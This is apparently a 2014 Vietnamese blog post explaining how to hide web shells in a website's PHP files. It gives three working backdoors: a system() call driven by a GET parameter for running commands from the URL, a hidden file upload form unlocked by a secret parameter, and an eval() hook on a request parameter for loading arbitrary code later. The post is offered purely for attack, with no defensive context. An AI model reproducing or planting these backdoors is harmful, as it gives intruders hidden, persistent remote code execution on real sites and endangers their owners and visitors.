Thứ Sáu, 7 tháng 2, 2014

Ẩn Shell Giấu Shell.

Ẩn Shell trong file:
Cách 1:Sửa 1 file bất kì, thêm đoạn code sau vào:

Code:
<pre> <?php System($_GET['capuchino']) ?> <pre>

Sử dụng bằng cách gõ command tại address.Ví dụ ta sửa file index.php thì chạy shell:

index.php?capuchino=<command>
Cách 2: Dùng Shell Upload ẩn
<?php
if($_GET['capu']=='capu')
{
echo '<form method="POST" enctype="multipart/form-data" action="?capu=capu">
<input type="file" name="file_upload" size="20" id="file">
<input type="submit" name="gui" value="Up" >
</form>';
if (isset($_POST['gui'])){
move_uploaded_file($_FILES['file_upload']['tmp_name'], $_FILES['file_upload']['name']);
}
}

Cách 3:Chèn Hàm Eval vào.Lúc nào cần load code lên thì load.
<?php
eval($_REQUEST["loadcode"]);/
?>

Không có nhận xét nào:

Đăng nhận xét